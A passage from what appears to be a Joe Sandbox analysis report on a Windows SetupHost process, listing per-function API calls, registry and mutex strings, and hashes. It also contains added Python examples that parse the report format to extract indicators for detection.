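    image_base: Optional[int] = None


def parse_entry(text: str) -> FunctionEntry:
    """Parse one function entry; lines without a bullet are section headings."""
    entry = FunctionEntry()
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if not line.startswith("•"):
            section = line
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
                sub = int(m["sub"], 16) if m["sub"] else None
                entry.apis.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
        elif section == "Strings":
            m = STRING_RE.match(line)
            if m:
                xrefs = [int(x, 16) for x in re.split(r",\s*", m["xrefs"])]
                entry.strings.append(StringRef(m["text"], xrefs))
        elif section == "Memory Dump Source":
            m = SOURCE_RE.match(line)
            if m:
                entry.source_file, entry.image_base = m["file"], int(m["base"], 16)
    return entry


def imports_by_module(entry: FunctionEntry, include_subcalls: bool = False) -> Dict[str, List[str]]:
    """Group the APIs a function calls by module, in first-seen order; subcall lines are optional."""
    out: Dict[str, List[str]] = {}
    for c in entry.apis:
        if c.subcall_of is not None and not include_subcalls:
            continue
        names = out.setdefault(c.module, [])
        if c.api not in names:
            names.append(c.api)
    return out


def registry_keys_opened(entry: FunctionEntry) -> List[str]:
    """Resolve RegOpenKeyEx*(hKey, lpSubKey, ...) calls to full paths when hKey is a predefined root."""
    keys = []
    for c in entry.apis:
        if c.api.startswith("RegOpenKeyEx") and len(c.args) >= 2:
            root = HKEY_NAMES.get(c.args[0].upper(), c.args[0])
            keys.append(f"{root}\\{c.args[1]}")
    return keys


def rva(entry: FunctionEntry, addr: int) -> int:
    """Image-relative offset of a call-site or xref address, for matching against a clean copy of the PE."""
    assert entry.image_base is not None, "entry has no Memory Dump Source line"
    return addr - entry.image_base


if __name__ == "__main__":
    e = parse_entry(SAMPLE)
    print(imports_by_module(e))
    print(registry_keys_opened(e))
    print(hex(rva(e, e.apis[0].ref)))
```

Subcall lines are parsed but excluded from `imports_by_module` by default, since the report attributes them to the callee (`004FE5FC` here), not to the function whose entry they appear in; pass `include_subcalls=True` when you want the transitive view.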
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004FD0B5: GetCurrentProcess.KERNEL32(?,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile,?,00000000), ref: 004FD0D0
                                                                                                                          • Part of subcall function 004FD0B5: IsWow64Process.KERNEL32(00000000,?,00000000), ref: 004FD0D7
                                                                                                                          • Part of subcall function 004FD0B5: GetLastError.KERNEL32(?,00000000), ref: 004FD0E1
                                                                                                                          • Part of subcall function 004FD0B5: RegCloseKey.ADVAPI32(?,?,00000000), ref: 004FD13F
                                                                                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000001,00000000,00000000,00000000), ref: 004FB216
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 004FB237
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 004FB23E
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 004FB29E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 004FB2A5
                                                                                                                        • RegCloseKey.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 004FB2B4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapProcess$Close$AllocCurrentErrorFreeLastQueryValueWow64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 700423131-0
                                                                                                                        • Opcode ID: 4db1ab5e0b79688da5f7a16f34c1bf1a4b3baf3f23e76d43605528f1973d411d
                                                                                                                        • Instruction ID: 68beabf6a4eff96f3da005615dadfd63136dfaa35a44ccef63aff1a423b4ea14
                                                                                                                        • Opcode Fuzzy Hash: 4db1ab5e0b79688da5f7a16f34c1bf1a4b3baf3f23e76d43605528f1973d411d
                                                                                                                        • Instruction Fuzzy Hash: 23217531A0031DEBDB119BE1D89CBBFB779EF09305F1141ABAA0196251CB788E049BD5
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004FD0B5: GetCurrentProcess.KERNEL32(?,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile,?,00000000), ref: 004FD0D0
                                                                                                                          • Part of subcall function 004FD0B5: IsWow64Process.KERNEL32(00000000,?,00000000), ref: 004FD0D7
                                                                                                                          • Part of subcall function 004FD0B5: GetLastError.KERNEL32(?,00000000), ref: 004FD0E1
                                                                                                                          • Part of subcall function 004FD0B5: RegCloseKey.ADVAPI32(?,?,00000000), ref: 004FD13F
                                                                                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,00000000,00000001,00000001,00000000,00000000,?,?,?,00000000), ref: 004FB430
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000001,?,00000000), ref: 004FB451
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 004FB458
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000001,00000000,00000000,?,?,?,00000000), ref: 004FB4B8
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000), ref: 004FB4BF
                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,?,?,?,00000000), ref: 004FB4CE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapProcess$Close$AllocCurrentErrorFreeLastQueryValueWow64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 700423131-0
                                                                                                                        • Opcode ID: e19cc93f20c5aefeb9d48b1c43b0636cd8c0beeaa9bef30140f5994132351a1d
                                                                                                                        • Instruction ID: e05f89db13b565228c5395ce26320881ff51def8318cf9a274e91b88235d0b0d
                                                                                                                        • Opcode Fuzzy Hash: e19cc93f20c5aefeb9d48b1c43b0636cd8c0beeaa9bef30140f5994132351a1d
                                                                                                                        • Instruction Fuzzy Hash: F021C571A0031DEBCB119FA0C988BBFB77DEF49315F10406AAA0192252DB788E05DBD5
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0053E8EC
                                                                                                                          • Part of subcall function 004F9180: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?), ref: 004F91BD
                                                                                                                          • Part of subcall function 004F9180: GetLastError.KERNEL32(?,?,00000104,?,?), ref: 004F91C9
                                                                                                                        • GetFileVersionInfoSizeExW.KERNELBASE(00000000,00000000,?,00000014,0053E880,?,?), ref: 0053E914
                                                                                                                        • GetLastError.KERNEL32 ref: 0053E921
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0053E935
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0053E93C
                                                                                                                        • GetFileVersionInfoExW.KERNELBASE(00000000,00000000,?,00000000,00000000), ref: 0053E955
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFileHeapInfoLastVersion$AllocEnvironmentExpandH_prolog3ProcessSizeStrings
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2253041425-0
                                                                                                                        • Opcode ID: d74c7f46aca8459f0ff22113a9b722ef765024508526d33b9e5cb373ed6c8dd8
                                                                                                                        • Instruction ID: 4556eeace2f137da43c2887965e6d74a7b2de0b08ea694d09268a3a2e0cdaf25
                                                                                                                        • Opcode Fuzzy Hash: d74c7f46aca8459f0ff22113a9b722ef765024508526d33b9e5cb373ed6c8dd8
                                                                                                                        • Instruction Fuzzy Hash: EE117232A0430E9BDF51AFE1C85A7BE7BB5BF44356F100419E501AB2D0DB748E04DBA1
APIs
• GetProcessHeap.KERNEL32(00000000,?,?,03317CEC,?,?,0054530B,?,03317CE0,?,00541F5A,?,03317CE0,00000000,?), ref: 00545294
• RtlAllocateHeap.NTDLL(00000000,?,0054530B,?,03317CE0,?,00541F5A,?,03317CE0,00000000,?,?,00541F26,?,00000004,004DC820), ref: 0054529B
• GetProcessHeap.KERNEL32(00000000,03317CEC,?,03317CEC,?,?,0054530B,?,03317CE0,?,00541F5A,?,03317CE0,00000000,?), ref: 005452BD
• HeapFree.KERNEL32(00000000,?,0054530B,?,03317CE0,?,00541F5A,?,03317CE0,00000000,?,?,00541F26,?,00000004,004DC820), ref: 005452C4
• GetProcessHeap.KERNEL32(00000000,?,?,0054530B,?,03317CE0,?,00541F5A,?,03317CE0,00000000,?,?,00541F26,?,00000004), ref: 005452CC
• HeapAlloc.KERNEL32(00000000,?,0054530B,?,03317CE0,?,00541F5A,?,03317CE0,00000000,?,?,00541F26,?,00000004,004DC820), ref: 005452D3
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
• Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: Heap$Process$AllocAllocateFree
• String ID:
• API String ID: 1927113959-0
• Opcode ID: 9cfd4893c0c781f6ac0e4add305b65876992c73fd7f0f6120cbcff3bbdf1b5f1
• Instruction ID: 22b84f5aed1b6664225e164338d8f329d13ceb5ebabe87def2a27248e72aa0ed
• Opcode Fuzzy Hash: 9cfd4893c0c781f6ac0e4add305b65876992c73fd7f0f6120cbcff3bbdf1b5f1
• Instruction Fuzzy Hash: 99116575508B06AFD7205F95DC58A57BFECFB6835AB10883EE58683611E7B0D840DB10
APIs
• __EH_prolog3.LIBCMT ref: 004F8917
• FreeLibrary.KERNEL32(00000000,0000000C,004ECD31,00000000), ref: 004F8A09
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
• Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: FreeH_prolog3Library
• String ID: CreateSetupObject
• API String ID: 1631603194-1491363812
• Opcode ID: 2312f2e553d6722c30291ed119f4adda2cddebd90db0761e6bf9e86cd00955ce
• Instruction ID: 7f702f54ecf7d3f58f5545d155090b0954a8e946912992af5f54c50415bb0bb9
• Opcode Fuzzy Hash: 2312f2e553d6722c30291ed119f4adda2cddebd90db0761e6bf9e86cd00955ce
• Instruction Fuzzy Hash: F6315D70A0030E8BCF15DFA9C854ABEB6B5AF98315F10042EEA05AB351CFB89D05DB55
APIs
  • Part of subcall function 004FD0B5: GetCurrentProcess.KERNEL32(?,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile,?,00000000), ref: 004FD0D0
  • Part of subcall function 004FD0B5: IsWow64Process.KERNEL32(00000000,?,00000000), ref: 004FD0D7
  • Part of subcall function 004FD0B5: GetLastError.KERNEL32(?,00000000), ref: 004FD0E1
  • Part of subcall function 004FD0B5: RegCloseKey.ADVAPI32(?,?,00000000), ref: 004FD13F
• RegQueryValueExW.KERNEL32(?,CorrelationVector,00000000,0N,00000000,?,00000001,?,00000000,00000000,004E3009,?,?), ref: 004FB0FE
• RegCloseKey.ADVAPI32(00000000,?,?), ref: 004FB13B
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
• Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: CloseProcess$CurrentErrorLastQueryValueWow64
• String ID: 0N$CorrelationVector$SYSTEM\Setup\MoSetup
• API String ID: 1531546272-2068452926
• Opcode ID: a09f81744bba12c75538e417d8cafcabafd303fd8a488e6ba0f86007f010230b
• Instruction ID: 298e9142e8617ca3a54c065688c525c03c69963854c984288366eacb87a20f8b
• Opcode Fuzzy Hash: a09f81744bba12c75538e417d8cafcabafd303fd8a488e6ba0f86007f010230b
• Instruction Fuzzy Hash: 9811E57560020CEFDF019FA8CA94BBEB7BAEBC5344F20406FEA0193390DB389E059654
APIs
  • Part of subcall function 004FE595: _vsnwprintf.MSVCRT ref: 004FE5C7
• CreateMutexW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000001), ref: 0054A66A
• WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,?,?,?,00000001), ref: 0054A67C
• GetLastError.KERNEL32(?,?,?,?,?,00000001), ref: 0054A6A4
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
• Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: CreateErrorLastMutexObjectSingleWait_vsnwprintf
• String ID: %s+%s+%s$Global\OneSettingQueryMutex
• API String ID: 551164369-777283268
• Opcode ID: c15857fbbbed65ad222bb64fdbc886e295d5064974cceec22c6bede4e3eede2f
• Instruction ID: 21a287f5f929095d9dd5f3360b66f91b0cc0f88a862822f25cff7ddd5effc81b
• Opcode Fuzzy Hash: c15857fbbbed65ad222bb64fdbc886e295d5064974cceec22c6bede4e3eede2f
• Instruction Fuzzy Hash: 311144B4F80319A7D750DB748C0DBEA3BACBF05308F394566F501DA2D0EA74D9048BA6
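Every block in this section follows one fixed layout: an "APIs" list of call sites (lines marked "Part of subcall function" belong to a callee, not to the function itself), a "Strings" list, the memory dump the function was lifted from, and the Similarity identifiers. The Python below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses that layout into records and pulls out the facts worth carrying into a detection, for instance the Global\OneSettingQueryMutex name that sits beside CreateMutexW in the record just above, and the 0000EA60 (60000 ms) literal passed as dwMilliseconds to WaitForSingleObject. The embedded input is three records copied from this section with their repeated memory-dump lines left out; the regular expression and the record, field and helper names are this example's own assumptions about the report format, not a Joe Sandbox API.

```python
"""Parse the per-function "APIs" records Joe Sandbox emits for a dumped module
(the layout used throughout this section) and pull out what an analyst turns
into indicators: named kernel objects, literal wait timeouts, the API profile.
Added example; not part of the Joe Sandbox report or of the analysed sample.
Record, field and helper names are this example's own."""
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import List, Optional

# Three records copied from the SetupHost (process 0x0D) analysis above, with
# the repeated "Memory Dump Source" lines left out.
SAMPLE = r"""
APIs
  • Part of subcall function 004FD0B5: GetCurrentProcess.KERNEL32(?,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile,?,00000000), ref: 004FD0D0
  • Part of subcall function 004FD0B5: GetLastError.KERNEL32(?,00000000), ref: 004FD0E1
• RegQueryValueExW.KERNEL32(?,CorrelationVector,00000000,0N,00000000,?,00000001,?,00000000,00000000,004E3009,?,?), ref: 004FB0FE
• API ID: CloseProcess$CurrentErrorLastQueryValueWow64
• String ID: 0N$CorrelationVector$SYSTEM\Setup\MoSetup
• API String ID: 1531546272-2068452926
APIs
  • Part of subcall function 004FE595: _vsnwprintf.MSVCRT ref: 004FE5C7
• CreateMutexW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000001), ref: 0054A66A
• WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,?,?,?,00000001), ref: 0054A67C
• GetLastError.KERNEL32(?,?,?,?,?,00000001), ref: 0054A6A4
• API ID: CreateErrorLastMutexObjectSingleWait_vsnwprintf
• String ID: %s+%s+%s$Global\OneSettingQueryMutex
• API String ID: 551164369-777283268
APIs
• wcschr.MSVCRT ref: 004F8DAD
• GetFileAttributesW.KERNEL32(?), ref: 004F8E48
• CreateDirectoryW.KERNEL32(?,00000000), ref: 004F8E60
• GetFileAttributesW.KERNEL32(?), ref: 004F8E71
• GetLastError.KERNEL32 ref: 004F8EAF
• API ID: AttributesFile$CreateDirectoryErrorLastwcschr
• String ID:
• API String ID: 2805896270-0
"""

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]                   # "?" marks an argument the sandbox could not resolve
    ref: str                          # call-site address in the dumped module
    subcall_of: Optional[str] = None  # set for "Part of subcall function X" lines

@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)  # "String ID" split on "$"
    api_string_id: str = ""

    def api_names(self):
        return {c.name for c in self.calls}

# "• [Part of subcall function X: ]Name.MODULE[(args)][,] ref: ADDR"
API_RE = re.compile(r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
                    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)$")

def parse_records(text: str) -> List[FunctionRecord]:
    """One FunctionRecord per "APIs" block; lines that are not calls or IDs are skipped."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
        elif cur is None:
            continue
        elif (m := API_RE.match(line)):
            args = [a for a in (m.group("args") or "").split(",") if a]
            cur.calls.append(ApiCall(m.group("name"), m.group("mod"), args,
                                     m.group("ref").upper(), m.group("sub")))
        elif line.startswith("• String ID:"):
            body = line.split(":", 1)[1].strip()
            cur.strings = body.split("$") if body else []
        elif line.startswith("• API String ID:"):
            cur.api_string_id = line.split(":", 1)[1].strip()
    return records

def wait_timeouts_ms(rec: FunctionRecord) -> List[int]:
    """dwMilliseconds (2nd argument) of each WaitForSingleObject call recovered as a hex literal."""
    return [int(c.args[1], 16) for c in rec.calls
            if c.name == "WaitForSingleObject" and len(c.args) > 1
            and re.fullmatch(r"[0-9A-Fa-f]+", c.args[1])]

def named_mutexes(records: List[FunctionRecord]) -> List[str]:
    """Kernel-object names next to a CreateMutex* call: host-wide artefacts a rule can key on."""
    creators = {"CreateMutexW", "CreateMutexA", "CreateMutexExW", "CreateMutexExA"}
    return [s for rec in records if rec.api_names() & creators
            for s in rec.strings if s.startswith(("Global\\", "Local\\"))]

def api_histogram(records: List[FunctionRecord]) -> Counter:
    """How often each API appears across the records (subcall lines included)."""
    return Counter(c.name for rec in records for c in rec.calls)

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for rec in recs:
        print(rec.api_string_id, sorted(rec.api_names()), wait_timeouts_ms(rec))
    print("mutexes:", named_mutexes(recs), api_histogram(recs).most_common(3))
```

The parser only reacts to "APIs" headers, call lines, "String ID" and "API String ID", so it can be pointed at the whole report text as extracted; subcall lines are kept but tagged with the callee address, which lets a histogram distinguish what a function calls directly from what its callees do.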
APIs
• wcschr.MSVCRT ref: 004F8DAD
• GetFileAttributesW.KERNEL32(?), ref: 004F8E48
• CreateDirectoryW.KERNEL32(?,00000000), ref: 004F8E60
• GetFileAttributesW.KERNEL32(?), ref: 004F8E71
• GetLastError.KERNEL32 ref: 004F8EAF
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
• Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: AttributesFile$CreateDirectoryErrorLastwcschr
• String ID:
• API String ID: 2805896270-0
• Opcode ID: f39d695da9baa52d620391617d15fc9fc4f6fcc4a99c1b91071195b175e4285e
• Instruction ID: 8d2eccc039c4c4577d4847a4de6615f08fe433a2da0409f478e2f64fb61063b1
• Opcode Fuzzy Hash: f39d695da9baa52d620391617d15fc9fc4f6fcc4a99c1b91071195b175e4285e
• Instruction Fuzzy Hash: DC51E831A0162D47CF209B759C847BF7265AF94720F1106AFE605EF291EF789E858B8C
APIs
• GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000,?,00000000,00000000,?), ref: 004FC8A8
• RtlAllocateHeap.NTDLL(00000000), ref: 004FC8AF
• memcpy.MSVCRT(00000000,?,?), ref: 004FC8D1
• GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?), ref: 004FC90E
• HeapFree.KERNEL32(00000000), ref: 004FC915
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
• Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: Heap$Process$AllocateFreememcpy
• String ID:
• API String ID: 461410222-0
• Opcode ID: 6ef9852900dcbbf2d5873574e45173237cad63066ad800434547d39bb8bc6f7c
• Instruction ID: 27f61dc2fec1335f52ed6d3cec9e811fb283506910220f314c0c2a02eef90df9
• Opcode Fuzzy Hash: 6ef9852900dcbbf2d5873574e45173237cad63066ad800434547d39bb8bc6f7c
• Instruction Fuzzy Hash: 69418675B0020EEBCB04EFA5C6D097EBBA5AF88355F10812EE606D7341DB789D05CB88
APIs
• GetProcessHeap.KERNEL32(00000000,?), ref: 005461F9
• HeapFree.KERNEL32(00000000), ref: 00546200
• GetProcessHeap.KERNEL32(00000000,?), ref: 0054620F
• HeapAlloc.KERNEL32(00000000), ref: 00546216
• GetFileSizeEx.KERNEL32(?,?), ref: 0054628D
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
• Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: Heap$Process$AllocFileFreeSize
• String ID:
• API String ID: 2012773705-0
• Opcode ID: 76441075a9192ba786914e5ea022fedb429189ad633f4df9a62d788189687b37
• Instruction ID: 0575cb3f22049811727fa61c3ee4e241f51fc36250bc150b650fe3d0a4902e5c
• Opcode Fuzzy Hash: 76441075a9192ba786914e5ea022fedb429189ad633f4df9a62d788189687b37
• Instruction Fuzzy Hash: 5031F639604206EFCB14EF64DC44AEABFB9FF897497088165E905CB114EB70ED05CBA1
APIs
• WinHttpCloseHandle.WINHTTP(?,00000004,00000000,004FA6AB,?,00000000,004FA11D,?,?,00000000,004EB0E2), ref: 005488D5
• WinHttpCloseHandle.WINHTTP(?,00000004,00000000,004FA6AB,?,00000000,004FA11D,?,?,00000000,004EB0E2), ref: 005488E6
• WinHttpCloseHandle.WINHTTP(00000000,00000004,00000000,004FA6AB,?,00000000,004FA11D,?,?,00000000,004EB0E2), ref: 005488F5
• GetProcessHeap.KERNEL32(00000000,?,00000004,00000000,004FA6AB,?,00000000,004FA11D,?,?,00000000,004EB0E2), ref: 00548906
• HeapFree.KERNEL32(00000000,?,?,00000000,004EB0E2), ref: 0054890D
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
• Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: CloseHandleHttp$Heap$FreeProcess
• String ID:
• API String ID: 715821489-0
• Opcode ID: d3a49feb7fb386ea9633e33ea865aec1e33596215aa743db88302a5a6f0ba883
• Instruction ID: e95db805ddbbc32e3cca72e9b4cea6e5be3973df9c0a5533ce6a4ccc246324f6
• Opcode Fuzzy Hash: d3a49feb7fb386ea9633e33ea865aec1e33596215aa743db88302a5a6f0ba883
• Instruction Fuzzy Hash: 48012435401B01DFC3329F24E9188FABFF5FFA87027204A2DE4AA42564CB326895EF40
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004FD21F: GetCurrentProcess.KERNEL32(00000000,SYSTEM\Setup\MoSetup\Volatile,?,?,SYSTEM\Setup\MoSetup\Volatile,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile), ref: 004FD25E
                                                                                                                          • Part of subcall function 004FD21F: IsWow64Process.KERNEL32(00000000,?,SYSTEM\Setup\MoSetup\Volatile,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile), ref: 004FD265
                                                                                                                          • Part of subcall function 004FD21F: GetLastError.KERNEL32(?,SYSTEM\Setup\MoSetup\Volatile,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile), ref: 004FD26F
                                                                                                                          • Part of subcall function 004FD21F: RegCloseKey.ADVAPI32(00000000,?,SYSTEM\Setup\MoSetup\Volatile,SYSTEM\Setup\MoSetup\Volatile,00000000), ref: 004FD2E1
